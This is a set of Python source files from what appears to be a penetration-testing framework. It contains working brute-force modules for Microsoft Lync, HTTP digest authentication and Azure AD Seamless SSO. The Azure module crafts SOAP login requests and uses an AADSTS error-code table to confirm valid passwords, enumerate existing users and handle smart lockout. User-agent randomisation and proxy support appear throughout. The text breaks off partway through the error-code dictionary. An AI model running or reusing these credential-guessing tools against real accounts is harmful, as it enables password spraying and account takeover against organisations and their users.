#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
from re import search
import requests
from bfg.shortcuts.http import HTTPModule
import pdb

class Module(HTTPModule):

    description = brief_description = 'Brute force Microsoft Lync.'
    # Details expected request/response: https://docs.microsoft.com/en-us/skype-sdk/ucwa/authenticationinucwa
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __call__(self, username, password, *args, **kwargs):


        # post data
        data = {
            'grant_type':'password',
            'username':username,
            'password':password
        }

        print(self.headers)

        # make the request
        resp = requests.post(self.url,
                data=data,
                headers=self.headers,
                verify=self.verify_ssl,
                allow_redirects=False,
                proxies=self.proxies)
    
        # verify credentials and return outcome
        '''
        HTTP/1.1 200 OK
        Content-Type: application/json;charset=UTF-8
        {
            "access_token":"cwt=2YotnFZFEjr1zCsicMWpAA...",
            "token_type":"Bearer",
            "expires_in":3600
        }
        '''

        if resp.status_code == 200 and resp.json()['access_token']:
            return dict(outcome=1, username=username, password=password)
        else:
            return dict(outcome=0, username=username, password=password)



#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
from re import search
import requests
from requests.auth import HTTPDigestAuth as HDA
from bfg.shortcuts.http import HTTPModule, handleUA

class Module(HTTPModule):

    # String found to match any of those inserted here will be
    # replaced with a string literal value of ''
    blank_signatures = []

    description = brief_description = 'Generic HTTP basic digest auth'
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    @handleUA
    def __call__(self,username,password,*args,**kwargs):

        if self.blank_handler(username): username = ''
        if self.blank_handler(password): password = ''

        # http://docs.python-requests.org/en/master/user/authentication/
        resp = requests.get(self.url,
            auth=HDA(username,password),
            headers=self.headers,
            verify=self.verify_ssl,
            allow_redirects=False,
            proxies=self.proxies)
    
        # verify credentials and return outcome
        if resp.status_code == 401:
            return dict(outcome=0, username=username, password=password)
        else:
            return dict(outcome=1, username=username, password=password)
    
    def blank_handler(self,value):

        if value in self.__class__.blank_signatures:
            return True
        else:
            return False



import re
import inspect
from bfg.data import loadAzureSSOSoap
from datetime import datetime, timedelta
from xmltodict import parse as xmltodict
from xml.sax.saxutils import escape as xEscape
from requests import Session
from dict_tools.data import subdict_match, traverse_dict
from uuid import uuid4 as uuid
from bfg.args import http as http_args, argument
from bfg.shortcuts.http import HTTPModule, handleUA
from bfg.shortcuts.azure import *
from requests.exceptions import ConnectionError

AZURE_SSO_URL   = 'https://autologon.microsoftazuread-sso.com'
AZURE_SSO_PATH  = '/{domain}/winauth/trust/2005/usernamemixed?' \
    'client-request-id={request_id}'
SOAP_DICT_PATH = 'S:Envelope-S:Body-S:Fault-S:Detail-psf:' \
    'error-psf:internalerror-psf:text'
SSO_TIME_FMT = '%Y-%m-%dT%H:%M:%S.%fZ'
SOAP_DOC = loadAzureSSOSoap()

def strip_slash(s):

    if s and s[-1] == '/':
        s=s[:len(s)-1]

    return s

class Session(Session):

    def __init__(self, url=None, headers=None, allow_redirects=None,
            verify_ssl=False, *args, **kwargs):

        super().__init__(*args, **kwargs)

        # Configure redirects
        self.allow_redirects=allow_redirects

        # using the setattr builtin here because requests.Session
        # doesn't care for new instance variables being assigned
        setattr(self, 'verify_ssl', verify_ssl)

        self.url = url

        # Update headers
        headers = headers if headers else {}
        self.headers.update(headers)

    def authenticate(self, username, password):

        if not '@' in username:
            message = (
                f'Username not supplied in email format: {username} .'
                'Disabling user from further guesses.')
            return -1, False, [message]

        credential = f'{username}:{password}'

        # ==================
        # PREPARE COMPONENTS
        # ==================

        # URL to target
        url = self.url + AZURE_SSO_PATH.format(
            domain=username.split('@')[1],
            request_id=str(uuid()))

        # Damned timestampes....friggen SOAP
        now = datetime.utcnow()
        created = now.strftime(SSO_TIME_FMT)
        expires = (now + timedelta(minutes=10)).strftime(SSO_TIME_FMT)

        # Craft the SOAP document
        payload = SOAP_DOC.format(
            url = url,
            message_id = str(uuid()),
            created = created,
            expires = expires,
            token_id = str(uuid()),
            username = xEscape(username),
            password = xEscape(password))

        # ======================================
        # MAKE THE REQUEST AND HANDLE THE OUTPUT
        # ======================================

        resp  =  self.post(url, data=payload,
            allow_redirects = self.allow_redirects,
            verify = self.verify_ssl)

        error_code = None

        try:

            sdict = xmltodict(resp.content)
            error_code = traverse_dict(sdict,
                key = SOAP_DICT_PATH,
                delimiter = '-')

        except Exception as e:

            # ==============================
            # REQUEST APPEARS TO HAVE FAILED
            # ==============================

            message = \
                f'Failed to parse XML response for {credential}. Reason: {e}'

            return -1, True, [message]

        if not error_code and resp.status_code == 200:

            # ======================
            # BASIC SUCCESS RESPONSE
            # ======================

            return 1, True, ['200 OK response']

        elif error_code:

            # ===================
            # ALL OTHER RESPONSES
            # ===================

            try:
                error_code = error_code.split(':')[0]
            except:
                pass

            outcome, username_valid, events = \
                lookupCode(resp.status_code, error_code)

            if events:
                events[0] += f' - {credential}'

            return outcome, username_valid, events

        else:

            return -1, True, ['Unhandled response event occurred'] 

def url():

    return http_args.url(
        name_or_flags=('--url',),
        required=False,
        default=AZURE_SSO_URL,
        help='Azure SSO URL to target. Default: %(default)s')

class Module(HTTPModule):

    brief_description = 'Azure Active Directory AD Seamless SSO'
    description = 'Brute force the Azure AD SSO endpoint.'
    args = [url()]+http_args.getDefaults('url',invert=True)
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]
    references = [
        'SecureWorks - Vuln Disclosure - https://www.secureworks.com' \
                '/research/undetected-azure-active-directory-brute-f' \
                'orce-attacks'
        ]

    @handleUA 
    def __call__(self, username, password, *args, **kwargs):
        '''Proxy the call request up to the Session object to perform
        authentication.
        '''

        session = Session(url=self.url,
                headers=self.headers,
                verify_ssl=self.verify_ssl,
                allow_redirects=self.allow_redirects)

        if self.proxies:
            session.proxies.update(self.proxies)

        try:

            outcome, valid_account, events = \
                session.authenticate(username, password)

        except ConnectionError:

            return dict(
                outcome=-1,
                username=username,
                password=password,
                events=['Connection timed out'])

        events = events if events else []

        return dict(outcome=outcome,
                username=username,
                password=password,
                actionable=valid_account,
                events=events)





from bfg import data
from bfg.module import Module
from bfg.args.http import getDefaults as defaultHTTPArgs
import warnings
from urllib.parse import urlparse
import re
from bruteloops.db_manager import csv_split
from functools import wraps
from random import randint
from inspect import getargspec
import pdb

warnings.filterwarnings('ignore')
PROXY_FORMAT='<http|https>:<Proxy URI>'
PROXY_EXAMPLE='https:http://127.0.0.1:8080'
DEFAULT_USER_AGENT = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 ' \
        'Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko' \
        ') Chrome/85.0.4183.121 Mobile Safari/537.36'

# Application protocols are only http and https
PROXY_RE= re.compile('^(?P<app_proto>(http|https)?):(?P<proxy_uri>.+)', re.I)

# Requests supports only http, https, and socs5 proxies
PROXY_URI_RE=re.compile('^(http|https|socks5)://(.+):[0-9]{1,5}')

def handleUA(f):
    '''A decorator to handle user agent strings, supporting a
    randomization capability. If the string is "RANDOM", then
    a random value will be selected from bruteloops.data.UAS.
    See that module to learn where random values originate
    from.
    '''

    @wraps(f)
    def wrapper(self, username, password, *args, **kwargs):

        if self.randomize_ua:

            # ======================
            # GET A RANDOM UA STRING
            # ======================

            # loadUserAgents actually only loads when UAS is
            # empty or the force argument is set to True.
            data.loadUserAgents()

            if data.UAS:

                # Get a value from UAS
                self.user_agent = data.UAS[randint(0, len(data.UAS)-1)]

        # Set the header value
        if self.user_agent:
            self.headers['User-Agent'] = self.user_agent
        elif not self.headers.get('User-Agent'):
            self.headers['User-Agent'] = DEFAULT_UA

        return f(self, username, password, *args, **kwargs)

    return wrapper

class HTTPModule(Module):

    args = defaultHTTPArgs()

    def __init__(self, url, proxies, headers, verify_ssl, user_agent,
            allow_redirects, *args, **kwargs):
        '''Update the __init__ method of a class with a signature for common
        arguments that are passed to the Requests module, facilitating rapid
        development of brute force modules.
        '''

        self.url = url

        self.proxies = {}
        self.headers = {}
        self.user_agent = user_agent
        self.verify_ssl = True if verify_ssl else False
        self.allow_redirects = True if allow_redirects else False

        # ===================
        # HANDLE HTTP PROXIES
        # ===================
        proxies = proxies if proxies != None else []

        # Ensure that the proxies are being passed as a list
        # this is handled by argparse as "nargs:+," in the function
        # annotations.
        if proxies and not isinstance(proxies,list):
            raise ValueError('Invalid proxies argument. Must be list.')

        for proxy in proxies:

            proxy = proxy.lower()

            # Parse the proxy configuration via capture group
            match = re.match(PROXY_RE, proxy)

            # Raise a ValueError if an improperly formatted value is supplied
            if not match:

                raise ValueError(
                    'Proxies must be supplied in the following format: '
                    '{}, e.g. {}'.format(
                        PROXY_FORMAT,PROXY_EXAMPLE)
                )

            # Prepare the value dictionary
            gd = match.groupdict()

            # Ensure the proxy URI is valid 
            if not re.match(PROXY_URI_RE, gd['proxy_uri']):

                raise ValueError(
                    'Invalid destination URL provided for proxy: "{}". '
                    'Valid proxy configuration format: {}, eg {}'.format(
                        gd['proxy_uri'],PROXY_FORMAT,PROXY_EXAMPLE)
                )

            try:

                self.proxies[gd['app_proto']]=gd['proxy_uri']

            except Exception as e:

                raise ValueError('Invalid proxy value supplied.')

        # ===================
        # HANDLE HTTP HEADERS
        # ===================
        '''Parse a list of HTTP headers from the arguments.

        Each header is expected to be formatted as:

        <HeaderKey>: <HeaderValue>

        Note that the colon+space ": " value serves as the
        actual split delimiter.
        '''

        headers = headers if headers != None else {}

        for header in headers:
            try:
                key, value = header.split(': ', 1)
                self.headers[key] = value.strip()
            except Exception as e:
                raise ValueError(
                        f'Invalid header supplied: {header}'
                    )

        # ========================
        # OTHER INSTANCE VARIABLES
        # ========================

        self.randomize_ua = False
        if self.user_agent == 'RANDOM':
            self.randomize_ua = True
            self.headers['User-Agent'] = DEFAULT_USER_AGENT 
        elif self.user_agent:
            self.headers['User-Agent'] = self.user_agent
        else:
            self.headers['User-Agent'] = DEFAULT_USER_AGENT 

    @property
    def request_args(self):
        '''Return instance variables intended to be used as arguments
        to the requests library as a dictionary, facilitating expansion
        via `**` operator.

        Example:

        ```
        resp = requests.post(
            **self.request_args,
            data=payload)
        ```
        '''

        return {'url':self.url,
            'headers':self.headers,
            'proxies':self.proxies,
            'allow_redirects':self.allow_redirects,
            'verify':self.verify_ssl}



from bfg.defaults import *
from random import randint
import re

# Compiled regex to match the keys of ERROR_CODES
#ERROR_CODE_RE = re.compile('.+(AADSTS[0-9]{5,})')
ERROR_CODE_RE = re.compile('.+(AADSTS[0-9]+)')

def lookupCode(status_code:int, error_code:str) -> (int, bool, [str]):
    '''Accept an HTTP status code and Azure error code to determine
    the outcome of an authentication request.

    Args:
        status_code: HTTP status code of the request.
        error_code: Azure error code parsed from the HTTP response.

    Returns:
        A tuple of values that can be used to craft the return
        value for BruteLoops:

        (
          int determining if authentication was successful
          bool determining if the username is valid
          [str] a list of log events
        )
    '''

    message = f'[{error_code}] - '

    if status_code == 200 or error_code in VALID_CODES:

        # =================
        # VALID CREDENTIALS
        # =================

        message += f'VALID CREDENTIALS - REASON - '

        if error_code in VALID_CODES:
            message += ERROR_CODES[error_code]
        else:
            message += 'No graph reason, indiciative of active/' \
                'accessible account'

        return CRED_VALID, USERNAME_VALID, [message]

    elif error_code == 'AADSTS50053':

        # =======================================
        # ACCOUNT VALID, BUT SMARTLOCK IS ENGAGED
        # =======================================

        message += 'INVALID CREDENTIALS - ' \
            f'Smart Lock - Will ' \
            'attempt credentials during next iteration.'

        return CRED_FAILED, USERNAME_VALID, [message]

    elif error_code == 'AADSTS50034':

        # ============
        # UNKNOWN USER
        # ============

        message += 'User does not exist.'

        return CRED_FAILED, USERNAME_INVALID, [message]

    elif error_code == 'AADSTS90019':

        # =====================
        # NO TENANT INFORMATION
        # =====================

        message += 'No tenant-identifying information supplied in ' \
            'the authentication data, e.g. domain name.'

        return CRED_FAILED, USERNAME_INVALID, [message]

    elif error_code == 'AADSTS50056':

        # =======================================
        # GOOD USER, BUT NO PASSWORD SET FOR USER
        # =======================================

        message += 'User exists but does not have a password in ' \
            'Azure AD'

        return CRED_FAILED, USERNAME_VALID, [message]

    elif error_code == 'AADSTS80014':

        # ====================================
        # GOOD USER, PASSTHROUGH TIME EXCEEDED
        # ====================================

        message += 'User exists but pass-through time exceeded.'

        return CRED_FAILED, USERNAME_VALID, [message]

    elif error_code in VALID_USERNAME_CODES:

        # =======================================
        # PASSWORD INVALID, BUT USERNAME IS VALID
        # =======================================

        return CRED_INVALID, USERNAME_VALID, None

    elif error_code in FATAL_CODES:

        # =============================
        # SOMETHING WENT TERRIBLY WRONG
        # =============================

        raise Exception(
            f'Graph Error Code: {error_code}: ' \
            f'{ERROR_CODES.get(error_code)}')

    else:

        # =============================
        # SOMETHING WENT....EVEN WORSE?
        # =============================

        message += 'Unhandled Azure AD error code'
        if error_code in ERROR_CODES:
            message += '-> {}'.format(ERROR_CODES[error_code])

        return CRED_FAILED, True, [message]

def getRandomListItem(lst:list):
    '''Return a random element from lst.

    Args:
        lst: List to pull an element from.
    '''

    llen = len(lst)

    if llen == 0:
        raise ValueError(
            'lst must have at least one element')
    elif llen ==1:
        return lst[0]

    return lst[randint(0,len(lst)-1)]

def getRandomDictKey(dct:dict):
    '''Return a random key from the dictionary.

    Args:
        dct: Dictionary to pull a random key from.
    '''

    keys = list(dct.keys())
    return getRandomListItem(keys)

def getRandomClientID() -> (str, str, str):
    '''Get a random client ID from CIDS.

    Returns:
        (client, tag, client_id)
    '''

    client = getRandomDictKey(CIDS)
    tag = getRandomDictKey(CIDS[client])

    return client, tag, getRandomListItem(CIDS[client][tag])

def getRandomResource() -> (str, str):
    '''Get a random resource from RESOURCES and return the name along
    with the URL.

    Returns:
        (resource_name, resource_url,)
    '''

    name = getRandomDictKey(RESOURCES)
    return name, RESOURCES[name]

# A list of code values known to be associated with responses for
# valid credentials
VALID_CODES = [
    'AADSTS50014',
    'AADSTS50055',
    'AADSTS50057',
    'AADSTS50072',
    'AADSTS50074',
    'AADSTS50076',
    'AADSTS50079',
    'AADSTS50129',
    'AADSTS50131',
    'AADSTS50144',
    'AADSTS50158',
    'AADSTS53000',
    'AADSTS53001',
    'AADSTS53004',
    'AADSTS80012',
    'AADSTS90072',
    'AADSTS90094',
    'AADSTS50158',
]

VALID_USERNAME_CODES = [
    'AADSTS50126',
    'AADSTS50053',
    'AADSTS50056',
    'AADSTS80014',
]

# A list of cade values that should throw an exception when detected

FATAL_CODES = [
    'ADSTS20001',
    'AADSTS20012',
    'AADSTS20033',
    'AADSTS40008',
    'AADSTS40009',
    'AADSTS40010',
    'AADSTS40015',
    'AADSTS50000',
    'AADSTS50005',
    'AADSTS50008',
    'AADSTS50020',
    'AADSTS50128',
    'AADSTS50180',
    'AADSTS51001',
    'AADSTS90023',
    'AADSTS90024',
    'AADSTS530032',
    'AADSTS700016',
    'AADSTS9002313'
]

ERROR_CODES = \
{'AADSTS1000000': 'UserNotBoundError - The Bind API requires the Azure '
                  'AD user to also authenticate with an external IDP, '
                  "which hasn't happened yet.",
 'AADSTS1000002': 'BindCompleteInterruptError - The bind completed '
                  'successfully, but the user must be informed.',
 'AADSTS120000': 'PasswordChangeIncorrectCurrentPassword',
 'AADSTS120002': 'PasswordChangeInvalidNewPasswordWeak',
 'AADSTS120003': 'PasswordChangeInvalidNewPasswordContainsMemberName',
 'AADSTS120004': 'PasswordChangeOnPremComplexity',
 'AADSTS120005': 'PasswordChangeOnPremSuccessCloudFail',
 'AADSTS120008': 'PasswordChangeAsyncJobStateTerminated - A '
                 'non-retryable error has occurred.',
 'AADSTS120011': 'PasswordChangeAsyncUpnInferenceFailed',
 'AADSTS120012': 'PasswordChangeNeedsToHappenOnPrem',
 'AADSTS120013': 'PasswordChangeOnPremisesConnectivityFailure',
 'AADSTS120014': 'PasswordChangeOnPremUserAccountLockedOutOrDisabled',
 'AADSTS120015': 'PasswordChangeADAdminActionRequired',
 'AADSTS120016': 'PasswordChangeUserNotFoundBySspr',
 'AADSTS120018': 'PasswordChangePasswordDoesnotComplyFuzzyPolicy',
 'AADSTS120020': 'PasswordChangeFailure',
 'AADSTS120021': 'PartnerServiceSsprInternalServiceError',
 'AADSTS130004': "NgcKeyNotFound - The user principal doesn't have the "
                 'NGC ID key configured.',
 'AADSTS130005': 'NgcInvalidSignature - NGC key signature verified '
                 'failed.',
 'AADSTS130006': 'NgcTransportKeyNotFound - The NGC transport key '
                 "isn't configured on the device.",
 'AADSTS130007': 'NgcDeviceIsDisabled - The device is disabled.',
 'AADSTS130008': 'NgcDeviceIsNotFound - The device referenced by the '
                 "NGC key wasn't found.",
 'AADSTS135010': 'KeyNotFound',
 'AADSTS140000': 'InvalidRequestNonce - Request nonce is not provided.',
 'AADSTS140001': 'InvalidSessionKey - The session key is not valid.',
 'AADSTS16000': 'SelectUserAccount - This is an interrupt thrown by '
                'Azure AD, which results in UI that allows the user to '
                'select from among multiple valid SSO sessions. This '
                'error is fairly common and may be returned to the '
                'application if prompt=none is specified.',
 'AADSTS16001': "UserAccountSelectionInvalid - You'll see this error "
                'if the user clicks on a tile that the session select '
                'logic has rejected. When triggered, this error allows '
                'the user to recover by picking from an updated list '
                'of tiles/sessions, or by choosing another account. '
                'This error can occur because of a code defect or race '
                'condition.',
 'AADSTS16002': 'AppSessionSelectionInvalid - The app-specified SID '
                'requirement was not met.',
 'AADSTS16003': 'SsoUserAccountNotFoundInResourceTenant - Indicates '
                "that the user hasn't been explicitly added to the "
                'tenant.',
 'AADSTS165900': 'InvalidApiRequest - Invalid request.',
 'AADSTS17003': "CredentialKeyProvisioningFailed - Azure AD can't "
                'provision the user key.',
 'AADSTS20001': "WsFedSignInResponseError - There's an issue with your "
                'federated Identity Provider. Contact your IDP to '
                'resolve this issue.',
 'AADSTS20012': "WsFedMessageInvalid - There's an issue with your "
                'federated Identity Provider. Contact your IDP to '
                'resolve this issue.',
 'AADSTS20033': "FedMetadataInvalidTenantName - There's an issue with "
                'your federated Identity Provider. Contact your IDP to '
                'resolve this issue.',
 'AADSTS220450': 'UnsupportedAndroidWebViewVersion - The Chrome '
                 'WebView version is not supported.',
 'AADSTS220501': 'InvalidCrlDownload',
 'AADSTS221000': 'DeviceOnlyTokensNotSupportedByResource - The '
                 'resource is not configured to accept device-only '
                 'tokens.',
 'AADSTS240001': "BulkAADJTokenUnauthorized - The user isn't "
                 'authorized to register devices in Azure AD.',
 'AADSTS240002': "RequiredClaimIsMissing - The id_token can't be used "
                 'as urn:ietf:params:oauth:grant-type:jwt-bearer '
                 'grant.',
 'AADSTS40008': "OAuth2IdPUnretryableServerError - There's an issue "
                'with your federated Identity Provider. Contact your '
                'IDP to resolve this issue.',
 'AADSTS40009': "OAuth2IdPRefreshTokenRedemptionUserError - There's an "
                'issue with your federated Identity Provider. Contact '
                'your IDP to resolve this issue.',
 'AADSTS40010': "OAuth2IdPRetryableServerError - There's an issue with "
                'your federated Identity Provider. Contact your IDP to '
                'resolve this issue.',
 'AADSTS40015': "OAuth2IdPAuthCodeRedemptionUserError - There's an "
                'issue with your federated Identity Provider. Contact '
                'your IDP to resolve this issue.',
 'AADSTS50000': "TokenIssuanceError - There's an issue with the "
                'sign-in service. Open a support ticket to resolve '
                'this issue.',
 'AADSTS50001': 'InvalidResource - The resource is disabled or does '
                "not exist. Check your app's code to ensure that you "
                'have specified the exact resource URL for the '
                'resource you are trying to access.',
 'AADSTS50002': 'NotAllowedTenant - Sign-in failed because of a '
                "restricted proxy access on the tenant. If it's your "
                'own tenant policy, you can change your restricted '
                'tenant settings to fix this issue.',
 'AADSTS50003': 'MissingSigningKey - Sign-in failed because of a '
                'missing signing key or certificate. This might be '
                'because there was no signing key configured in the '
                'app. Check out the resolutions outlined at '
                '../manage-apps/application-sign-in-problem-federated-sso-gallery.md#certificate-or-key-not-configured. '
                'If you still see issues, contact the app owner or an '
                'app admin.',
 'AADSTS50005': 'DevicePolicyError - User tried to log in to a device '
                "from a platform that's currently not supported "
                'through Conditional Access policy.',
 'AADSTS50006': 'InvalidSignature - Signature verification failed '
                'because of an invalid signature.',
 'AADSTS50007': 'PartnerEncryptionCertificateMissing - The partner '
                'encryption certificate was not found for this app. '
                'Open a support ticket with Microsoft to get this '
                'fixed.',
 'AADSTS50008': 'InvalidSamlToken - SAML assertion is missing or '
                'misconfigured in the token. Contact your federation '
                'provider.',
 'AADSTS50010': 'AudienceUriValidationFailed - Audience URI validation '
                'for the app failed since no token audiences were '
                'configured.',
 'AADSTS50011': 'InvalidReplyTo - The reply address is missing, '
                'misconfigured, or does not match reply addresses '
                'configured for the app.  As a resolution ensure to '
                'add this missing reply address to the Azure Active '
                'Directory application or have someone with the '
                'permissions to manage your application in Active '
                'Directory do this for you.',
 'AADSTS50012': 'AuthenticationFailed - Authentication failed for one '
                'of the following reasons:The subject name of the '
                'signing certificate is not authorizedA matching '
                'trusted authority policy was not found for the '
                'authorized subject nameThe certificate chain is not '
                'validThe signing certificate is not validPolicy is '
                'not configured on the tenantThumbprint of the signing '
                'certificate is not authorizedClient assertion '
                'contains an invalid signature',
 'AADSTS50013': 'InvalidAssertion - Assertion is invalid because of '
                "various reasons - The token issuer doesn't match the "
                'api version within its valid time range -expired '
                '-malformed - Refresh token in the assertion is not a '
                'primary refresh token.',
 'AADSTS50014': "GuestUserInPendingState - The user's redemption is in "
                'a pending state. The guest user account is not fully '
                'created yet.',
 'AADSTS50015': 'ViralUserLegalAgeConsentRequiredState - The user '
                'requires legal age group consent.',
 'AADSTS50017': 'CertificateValidationFailed - Certification '
                'validation failed, reasons for the following '
                'reasons:Cannot find issuing certificate in trusted '
                'certificates listUnable to find expected '
                'CrlSegmentCannot find issuing certificate in trusted '
                'certificates listDelta CRL distribution point is '
                'configured without a corresponding CRL distribution '
                'pointUnable to retrieve valid CRL segments because of '
                'a timeout issueUnable to download CRLContact the '
                'tenant admin.',
 'AADSTS50020': 'UserUnauthorized - Users are unauthorized to call '
                'this endpoint.',
 'AADSTS50027': 'InvalidJwtToken - Invalid JWT token because of the '
                "following reasons:doesn't contain nonce claim, sub "
                'claimsubject identifier mismatchduplicate claim in '
                'idToken claimsunexpected issuerunexpected audiencenot '
                'within its valid time range token format is not '
                'properExternal ID token from issuer failed signature '
                'verification.',
 'AADSTS50029': 'Invalid URI - domain name contains invalid '
                'characters. Contact the tenant admin.',
 'AADSTS50032': 'WeakRsaKey - Indicates the erroneous user attempt to '
                'use a weak RSA key.',
 'AADSTS50033': 'RetryableError - Indicates a transient error not '
                'related to the database operations.',
 'AADSTS50034': 'UserAccountNotFound - To sign into this application, '
                'the account must be added to the directory.',
 'AADSTS50042': 'UnableToGeneratePairwiseIdentifierWithMissingSalt - '
                'The salt required to generate a pairwise identifier '
                'is missing in principle. Contact the tenant admin.',
 'AADSTS50043': 'UnableToGeneratePairwiseIdentifierWithMultipleSalts',
 'AADSTS50048': 'SubjectMismatchesIssuer - Subject mismatches Issuer '
                'claim in the client assertion. Contact the tenant '
                'admin.',
 'AADSTS50049': 'NoSuchInstanceForDiscovery - Unknown or invalid '
                'instance.',
 'AADSTS50050': 'MalformedDiscoveryRequest - The request is malformed.',
 'AADSTS50053': 'IdsLocked - The account is locked because the user '
                'tried to sign in too many times with an incorrect '
                'user ID or password.',
 'AADSTS50055': 'InvalidPasswordExpiredPassword - The password is '
                'expired.',
 'AADSTS50056': 'Invalid or null password -Password does not exist in '
                'store for this user.',
 'AADSTS50057': 'UserDisabled - The user account is disabled. The '
                'account has been disabled by an administrator.',
 'AADSTS50058': 'UserInformationNotProvided - This means that a user '
                "is not signed in. This is a common error that's "
                'expected when a user is unauthenticated and has not '
                'yet signed in.If this error is encouraged in an SSO '
                'context where the user has previously signed in, this '
                'means that the SSO session was either not found or '
                'invalid.This error may be returned to the application '
                'if prompt=none is specified.',
 'AADSTS50059': 'MissingTenantRealmAndNoUserInformationProvided - '
                'Tenant-identifying information was not found in '
                'either the request or implied by any provided '
                'credentials. The user can contact the tenant admin to '
                'help resolve the issue.',
 'AADSTS50061': 'SignoutInvalidRequest - The sign-out request is '
                'invalid.',
 'AADSTS50064': 'CredentialAuthenticationError - Credential validation '
                'on username or password has failed.',
 'AADSTS50068': 'SignoutInitiatorNotParticipant - Sign out has failed. '
                'The app that initiated sign out is not a participant '
                'in the current session.',
 'AADSTS50070': 'SignoutUnknownSessionIdentifier - Sign out has '
                'failed. The sign out request specified a name '
                "identifier that didn't match the existing session(s).",
 'AADSTS50071': 'SignoutMessageExpired - The logout request has '
                'expired.',
 'AADSTS50072': 'UserStrongAuthEnrollmentRequiredInterrupt - User '
                'needs to enroll for second factor authentication '
                '(interactive).',
 'AADSTS50074': 'UserStrongAuthClientAuthNRequiredInterrupt - Strong '
                'authentication is required and the user did not pass '
                'the MFA challenge.',
 'AADSTS50076': 'UserStrongAuthClientAuthNRequired - Due to a '
                'configuration change made by the admin, or because '
                'you moved to a new location, the user must use '
                'multi-factor authentication to access the resource. '
                'Retry with a new authorize request for the resource.',
 'AADSTS50079': 'UserStrongAuthEnrollmentRequired - Due to a '
                'configuration change made by the administrator, or '
                'because the user moved to a new location, the user is '
                'required to use multi-factor authentication.',
 'AADSTS50085': 'Refresh token needs social IDP login. Have user try '
                'signing-in again with username -password',
 'AADSTS50086': 'SasNonRetryableError',
 'AADSTS50087': 'SasRetryableError - The service is temporarily '
                'unavailable. Try again.',
 'AADSTS50089': 'Flow token expired - Authentication Failed. Have the '
                'user try signing-in again with username -password.',
 'AADSTS50097': 'DeviceAuthenticationRequired - Device authentication '
                'is required.',
 'AADSTS50099': 'PKeyAuthInvalidJwtUnauthorized - The JWT signature is '
                'invalid.',
 'AADSTS50105': 'EntitlementGrantsNotFound - The signed in user is not '
                'assigned to a role for the signed in app. Assign the '
                'user  to the app. For more '
                'information:../manage-apps/application-sign-in-problem-federated-sso-gallery.md#user-not-assigned-a-role.',
 'AADSTS50107': 'InvalidRealmUri - The requested federation realm '
                'object does not exist. Contact the tenant admin.',
 'AADSTS50120': 'ThresholdJwtInvalidJwtFormat - Issue with JWT header. '
                'Contact the tenant admin.',
 'AADSTS50124': 'ClaimsTransformationInvalidInputParameter - Claims '
                'Transformation contains invalid input parameter. '
                'Contact the tenant admin to update the policy.',
 'AADSTS50125': 'PasswordResetRegistrationRequiredInterrupt - Sign-in '
                'was interrupted because of a password reset or '
                'password registration entry.',
 'AADSTS50126': 'InvalidUserNameOrPassword - Error validating '
                'credentials due to invalid username or password.',
 'AADSTS50127': 'BrokerAppNotInstalled - User needs to install a '
                'broker app to gain access to this content.',
 'AADSTS50128': 'Invalid domain name - No tenant-identifying '
                'information found in either the request or implied by '
                'any provided credentials.',
 'AADSTS50129': 'DeviceIsNotWorkplaceJoined - Workplace join is '
                'required to register the device.',
 'AADSTS50131': 'ConditionalAccessFailed - Indicates various '
                'Conditional Access errors such as bad Windows device '
                'state, request blocked due to suspicious activity, '
                'access policy, or security policy decisions.',
 'AADSTS50132': 'SsoArtifactInvalidOrExpired - The session is not '
                'valid due to password expiration or recent password '
                'change.',
 'AADSTS50133': 'SsoArtifactRevoked - The session is not valid due to '
                'password expiration or recent password change.',
 'AADSTS50134': 'DeviceFlowAuthorizeWrongDatacenter - Wrong data '
                'center. To authorize a request that was initiated by '
                'an app in the OAuth 2.0 device flow, the authorizing '
                'party must be in the same data center where the '
                'original request resides.',
 'AADSTS50135': 'PasswordChangeCompromisedPassword - Password change '
                'is required due to account risk.',
 'AADSTS50136': 'RedirectMsaSessionToApp - Single MSA session '
                'detected.',
 'AADSTS50139': 'SessionMissingMsaOAuth2RefreshToken - The session is '
                'invalid due to a missing external refresh token.',
 'AADSTS50140': 'KmsiInterrupt - This error occurred due to "Keep me '
                'signed in" interrupt when the user was signing-in. '
                'Open a support ticket with Correlation ID, Request '
                'ID, and Error code to get more details.',
 'AADSTS50143': 'Session mismatch - Session is invalid because user '
                'tenant does not match the domain hint due to '
                'different resource. Open a support ticket with '
                'Correlation ID, Request ID, and Error code to get '
                'more details.',
 'AADSTS50144': "InvalidPasswordExpiredOnPremPassword - User's Active "
                'Directory password has expired. Generate a new '
                'password for the user or have the user use the '
                'self-service reset tool to reset their password.',
 'AADSTS50146': 'MissingCustomSigningKey - This app is required to be '
                'configured with an app-specific signing key. It is '
                'either not configured with one, or the key has '
                'expired or is not yet valid.',
 'AADSTS50147': 'MissingCodeChallenge - The size of the code challenge '
                'parameter is not valid.',
 'AADSTS50155': 'DeviceAuthenticationFailed - Device authentication '
                'failed for this user.',
 'AADSTS50158': 'ExternalSecurityChallenge - External security '
                'challenge was not satisfied.',
 'AADSTS50161': 'InvalidExternalSecurityChallengeConfiguration - '
                'Claims sent by external provider is not enough or '
                'Missing claim requested to external provider.',
 'AADSTS50166': 'ExternalClaimsProviderThrottled - Failed to send the '
                'request to the claims provider.',
 'AADSTS50168': 'ChromeBrowserSsoInterruptRequired - The client is '
                'capable of obtaining an SSO token through the Windows '
                '10 Accounts extension, but the token was not found in '
                'the request or the supplied token was expired.',
 'AADSTS50169': 'InvalidRequestBadRealm - The realm is not a '
                'configured realm of the current service namespace.',
 'AADSTS50170': 'MissingExternalClaimsProviderMapping - The external '
                'controls mapping is missing.',
 'AADSTS50177': 'ExternalChallengeNotSupportedForPassthroughUsers - '
                'External challenge is not supported for passthrough '
                'users.',
 'AADSTS50178': 'SessionControlNotSupportedForPassthroughUsers - '
                'Session control is not supported for passthrough '
                'users.',
 'AADSTS50180': 'WindowsIntegratedAuthMissing - Integrated Windows '
                'authentication is needed. Enable the tenant for '
                'Seamless SSO.',
 'AADSTS50187': 'DeviceInformationNotProvided - The service failed to '
